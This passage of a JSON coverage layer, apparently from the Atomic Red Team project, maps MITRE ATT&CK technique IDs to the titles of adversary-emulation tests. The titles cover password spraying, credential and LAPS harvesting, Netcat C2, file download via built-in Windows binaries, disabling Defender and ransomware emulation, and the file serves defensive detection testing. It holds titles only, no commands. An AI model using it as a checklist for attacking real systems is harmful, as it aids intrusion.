Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View 